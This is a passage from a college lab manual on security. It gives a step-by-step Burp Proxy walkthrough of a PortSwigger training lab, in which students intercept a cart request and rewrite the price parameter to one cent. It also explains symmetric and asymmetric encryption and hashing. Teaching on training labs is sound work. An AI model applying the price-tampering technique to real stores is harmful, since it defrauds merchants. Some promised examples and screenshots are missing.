websites, known as "labs", you'll see how this can help you identify and exploit real vulnerabilities.

●Step 1: Access the vulnerable website in Burp's browser

29
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

In Burp, go to the Proxy > Intercept tab and make sure interception is switched off. Launch Burp's browser and
use it to visit the following URL:

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-
controls

When the page loads, click Access the lab. If prompted, log in to your portswigger.net account.
After a few seconds, you will see your own instance of a fake shopping website.

●Step 2: Log in to your shopping account

On the shopping website, click My account and log in using the following credentials:

Username: wiener

Password: peter

Notice that you have just $100 of store credit.

●Step 3: Find something to buy

Click Home to go back to the home page. Select the option to view the product details for the Lightweight
"l33t" leather jacket.

●Step 4: Study the add to cart function

In Burp, go to the Proxy > Intercept tab and switch interception on. In the browser, add the leather jacket to
your cart to intercept the resulting POST /cart request

30
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

You may initially see a different request on the Proxy > Intercept tab if the browser is doing something else in
the background. In this case, just click Forward until you see the POST /cart request as shown in the
screenshot above. Study the intercepted request and notice that there is a parameter in the body called price,

which matches the price of the item in cents.

●Step 5: Modify the request

Change the value of the price parameter to 1 and click Forward to send the modified request to the server.

Switch interception off again so that any subsequent requests can pass through Burp Proxy uninterrupted.

●Step 6: Exploit the vulnerability

In Burp's browser, click the basket icon in the upper-right corner to view your cart. Notice that the jacket has
been added for just one cent. Note There is no way to modify the price via the web interface. You were only
able to make this change thanks to Burp Proxy. Click the Place order button to purchase the jacket for an
extremely reasonable price. Congratulations, you've also just solved your first Web Security Academy lab!
You've also learned how to intercept, review, and manipulate HTTP traffic using Burp Proxy.

Conclusion: Successfully implemented Burp proxy to test web applications.

31
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 8: To study Symmetric and Asymmetric cryptography

Symmetric vs asymmetric encryption. As if understanding the term “encryption” wasn’t hard enough, you’re
now expected to understand the different types of encryption! Well, that’s just how the world of encryption
and public key infrastructure (PKI) is. As you keep digging deeper, you’ll be asked to understand more and
more complicated things. Our brain cells might not be pleased with this, but it’s undoubtedly a good thing as it
gives us a deeper understanding of a technology that protects our data and privacy.

What is Encryption and Why Is It Necessary?

Encryption is the process of turning plaintext data into a scrambled format — so that no unauthorized entity
can see what the original data was — through the use of a cryptographic key. But that’s not the only benefit of
using different types of encryption — it can also help you to protect the integrity of your data, software,
communications, and be compliant with some data security and privacy laws and regulations. Encryption is
useful for protecting a variety of personally identifiable information (PII),financial data, intellectual
property, and other proprietary information such as:

●Names

●Social security numbers

●Contact information

●Credit card information

●Financial account information

●Credentials

●Technical specs, research, and other sensitive data

Encryption Keys Help to Secure Your Information

Regardless of which type of encryption you’re looking at, it’s going to require a digital key. A cryptographic key
is a string of randomly generated characters that’s part of an encryption algorithm. If you compare the process
of encryption to locking the door of your home, then the door lock mechanism becomes the encryption, and
your physical key becomes the encryption key. However, encryption differs from physical locks in terms of the
use of the keys: In encryption, the same key that encrypted the data may or may not be used to decrypt it.
This is an example of the difference between symmetric encryption and asymmetric encryption — the two
types of encryption we’ll discuss in this article. Breaking Down Encryption Types and Examples: Symmetric vs
Asymmetric Encryption

Symmetric Encryption

In simple terms, symmetric encryption is the simpler and conventional method of securing data. The reason
why it’s called “symmetric” is that it’s a process that involves the use of one key by all communicating parties
to encrypt and decrypt the data. Here’s visual breakdown of this method:

32
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

An Example of Symmetric Encryption in Action

Let’s understand this with two of our favorite characters (after Homer and Bart Simpson): Alice and Bob.

Let’s say Bob is an undercover spy agent who’s on a secret mission in a foreign country. Alice, on the other
hand, is his case officer who’s monitoring and guiding him. Bob, who’s surrounded by enemies, is
gathering information so that he can send it to Alice. But he has a huge concern: the data that he sends to
Alice might get intercepted by enemies, and he could be exposed.

To prevent that from happening, Alice gives a secret key to Bob and asks him to encrypt all the information
before sending it. Bob agrees, and he utilizes this key to encrypt the data. Alice possesses the same key and
applies the same key to decrypt the data to view the secret information. This way, Bob’s identity
remains a secret, and the data is passed on to Alice, creating a win-win situation. Advantages & Disadvantages
of Symmetric Encryption The most significant advantage when it comes to the symmetric encryption
method is its simplicity. As it has only one key doing encryption and decryption, symmetric encryption

algorithms are considered the fastest of the two types of encryption and require less
computational power to perform. However, the simplicity of symmetric encryption algorithms isn’t perfect —
it has an issue known as “key distribution.” In the case of Bob and Alice, symmetric encryption works just fine
as there are only two entities: a sender and a receiver. But what if Alice is gathering information from
thousands of sources? If she gives the same key to all of her agents, every piece of data then becomes
vulnerable if the key somehow gets exposed. And if Alice gives different symmetric keys to everyone, it means
that she must manage thousands of keys, which isn’t a practical thing to do.When you apply this concept to
the millions of communications that take place daily between clients (web browsers) and web servers
(websites), you’ll realize just how impractical that can be on a large scale.

Asymmetric Encryption:
Asymmetric encryption, as you can guess by its name, involves the use of multiple keys for data encryption
and decryption. To be exact, the asymmetric encryption method comprises two encryption keys that are
mathematically related to each other. These keys are known as the public key and private key. As a result, the
asymmetric encryption method is also known as “public key cryptography.”

An Example of Asymmetric Encryption in Action

Let’s understand this, as you rightly guessed, with the example of Alice and Bob once again. As we mentioned
earlier in the symmetric encryption example, Bob is an undercover spy agent who’s on a secret mission in a
foreign country and Alice is his case manager. Bob needs to send data in such a way that it doesn’t get
intercepted or tampered by their enemies. But this time, Alice figures out a new way to secure the
information and she gives one key, known as the public key, to Bob. Bob is instructed to encrypt his sensitive

33
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

information using the public key that he has. Alice, on the other end, has the mathematically related private
key and can easily decrypt the information he transmits using it.

Here’s how asymmetric encryption works:

Advantages and Disadvantages of Asymmetric Encryption

The reason why asymmetric encryption had to be invented was to solve the key distribution problem that arises
in the case of the symmetric encryption method. Therefore, in the case of Bob and Alice, even if the enemies
have Bob’s public key, they won’t be able to decipher the information as it can only be decrypted using Alice’s
private key. Not only that, but public key cryptography also solves the key management problem even if Alice is
getting information from millions of sources. All she has to do is to secure and manage the private key. However,
like most things in our world, everything comes with a price — and asymmetric encryption is no different. In
this case, that price tag comes in the form of decreased speed and computational power as this encryption
algorithm involves longer keys. This is why, of the two types of encryption, asymmetric encryption is considered
slower but more secure. Hybrid Encryption: Symmetric + Asymmetric Encryption Both encryption methods, as
we saw, have their own advantages as well as disadvantages. So,

what if we create a system that has the advantages of both? Well, it’s certainly possible. In many applications,
symmetric and asymmetric encryption methods are used together security sockets layer (SSL)/transport
layer security (TLS) cryptographic protocols being the foremost of them. In SSL/TLS certificates, first, the identity
verification is done utilizing asymmetric encryption. Once the identity of the server has been verified,
the encryption process happens using ephemeral symmetric encryption keys. This way, security risks of
symmetric encryption and performance/speed issues of asymmetric encryption can be mitigated. Cool, isn’t it?

Conclusion: Hence we have successfully studied Symmetric and Asymmetric cryptography.

34
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

Experiment – 9: To study and understand Hashing

Overview:

Hashes are essential to secure file transfers. You can find them in operations involving passwords,
file integrity checks, digital signatures, digital certificate thumbprints or fingerprints, and others. But
what are hashes? In this post, we'll introduce you to hashes, the concept of hashing, and its applications in
various areas of security.

What is hashing?
Hashing is an operation that takes any string of text, regardless of length or size, as input and then provides a
fixed-length string of characters as output. Here are some sample text and their equivalent hashes:

There are two things that immediately stand out here:

1. The lengths of the equivalent hashes in the examples are exactly the same (in this case 32 characters long),
regardless of the lengths of their original text. This is what I meant by hashes having a fixed-length. This behavior
should hold true even if the original text is a single word or a 1,000-page document. and

2. Even a slight difference in the original text ("the quick" vs "the quikk") results in two different hashes.

We'll dive into the implications of these two characteristics shortly.Encryption vs Hashing A hash looks pretty
much like the output of an encryption operation (a.k.a. ciphertext) does it? Well, encryption and hashing
operations do have similarities. However, they also have a couple of differences. First of all, unlike encryption,
hashing is always one way. In fact, hashing is often called "one way encryption". So, while you can decrypt an
encrypted text, you cannot "de-hash" a hashed text. We'll see why this can be a useful feature when we explain
how hashes are used, e.g. in password authentication systems. Properties of secure cryptographic hash
functions When hash functions (the underlying functions responsible for mapping the original text into a

hash) are used in information security, they must adhere to certain properties. These three are the most
important:

35
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

1. They must be efficient. The cryptographic hash function must not consume a lot of CPU cycles even if it's
made to operate on a huge file.
2. They must be one way functions. Meaning, it should be virtually impossible to obtain the original text (a.k.a.
the pre-image of the hash) from the hash.
3. They must have collision resistance. This means that it should be virtually impossible to find two different text
or documents that would yield the same hash. These are just idealised properties. In the real world, especially
with the constant emergence of more powerful computers, it may be impossible to arrive at a hash function
that would totally and forever uphold these three properties. Indeed, there are hashing algorithms that are no
longer considered secure. Still, strong hashing algorithms can last long enough to be used extensively in
securing business transactions until a technology or technique capable of breaking them comes along.
Let's take a look at some of the more commonly used hash algorithms. Commonly used hash algorithms

Some of the commonly used hashing algorithms include:

➢ MD5:
Message Digest 5 or MD5 was developed by Ron Rivest, whose name is immortalised as the R in RSA (a
public key cryptosystem common in various secure FTP protocols ). MD5 uses multiples of 512 bits as
input and produces a 128-bit message digest (or the hash) as output. It is one of the older hashing
algorithms but is now known to have certain vulnerabilities in its collision resistance properties.
➢ SHA1
Like the MD5 hash, SHA1 (secure hash algorithm) also takes 512 bits of input at a time. However, its
output is 160 bits. SHA-1 was the result of a joint project between the NSA and the NIST. Like MD5,
this cryptographic hash function has been proven to be relatively vulnerable to certain collision
attacks.
➢ CRC
CRC or Cyclic Redundancy Check is an example of a non-cryptographic hash
function.Compared to cryptographic hash functions, CRC hash functions can be easily reversed. Hence,
it isn't ideal for applications (e.g. digital signatures) that require functions with strong
irreversibility properties. It's more suitable for detecting accidental changes in stored or
transmitted files. In other words, it's used for data integrity checks.
➢ SHA-2
Once the SHA1 hash function was found to have potential vulnerabilities, the NSA decided to design a
set of stronger hash functions. The resulting product was SHA-2, a family of hash functions that had
224, 256 and 384, and 512 bits. These were known respectively as SHA224, SHA256, SHA384, and
SHA512.

We now look at some of the applications of hashing.

Hashing passwords

Secure systems never store passwords in the clear. That is, if you look at a password file, the
list of usernames and their corresponding passwords wouldn't look like this:
peter: password1234
james: mac@pRoS
sharon: shadowfax
Instead, it would likely look like this:

36
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

peter:
uclQZA4bN0DpisuT5mnGV2b2Zw3RYJupH/QQUrpIxvM=james:xw5UIGACzaNtYyZZjkaRY4a6uoVKhriy7NGLlW+
COeM=sharon: VgGAZRvmCKHoedevnDP2fUHMfuUNTcTL2XqFJGK7/qg=

The strings of characters you see after the equal signs are actually hashes (actually, base-64 equivalents of
hashes if you want to be more accurate) of each password. When a user logs in, the system first grabs whatever
is entered into the password field and converts that into a password hash. It's that hash that's used when looking
up the username/password pair in the password file. If a match is found, the user is allowed entry

That way, even if an attacker gets a hold of the password hash file, he wouldn't be able to use that file to login
to the system. Hashing is better than encryption in this case because it eliminates the possibility of the hashed

password being converted back to its plaintext equivalent. If you use encryption, it would be possible for an
attacker to acquire all passwords (in plaintext) if he were somehow able to acquire the decryption key.

Integrity checking Remember the second characteristic we were able to observe in the section
"What is hashing?"? If you recall, we noticed that even the slightest change in the original text can result

in an entirely different hash. This characteristic can be put to good use in data integrity checks.Let me give you
a simple example.

Let's say a user wants to download an important electronic document from a server. Because the integrity of
the data in that document is important to him, he would like to know if the document is altered along the way.
One way to do achieve this is by using a client and a server that supports the same hash function. Before sending
the file, the server must first obtain a hash value of the file using that hash function. Once the client receives
the file, it too must use the same hash function to generate a hash value. The two hash values must then be
compared. If the two values are equal, then it would be safe to conclude that the file has been unchanged

Digital signatures
Most data integrity checks are only carried out by the client. When a file is downloaded, it's usually already
accompanied by the file's hash a.k.a. message digest. The client then generates its own hash from the file it
downloaded and compares it with the message digest that came along with the download. This method has a

37
 ICOE/IT/7TH SEM/SAD/LAB MANUAL

flaw. What's to stop an attacker from intercepting the file, altering it, generating its own message digest using
the same hash function, and then forwarding the altered file (along with the new message digest) to the client?
Once the client receives the downloaded file and compares its locally-generated hash with the downloaded
hash, they will naturally appear equal. No way will this qualify for a HIPAA compliant file transfer. It's therefore
important for the client to make sure that both the downloaded file and the downloaded hash came from the
original source. This can be done using asymmetric encryption keys. Assuming the client has the
corresponding public key, the server can generate a "digital signature" using its private key and the message
digest. It’s this digital signature that will then be sent together with the file. So, when the client receives them,
it can then use the public key to verify the authenticity of the signature and retrieve the message digest. Only
then can the client compare the message digest with its locally-generated hash of the file.

A failure to authenticate could only mean that the private key that was used to generate the digital signature is
not the pair of the public key used by the client. Digital signatures are common in SSL-secured protocols like
FTPS.

Conclusion: Hence we have successfully study and understand Hashing.

38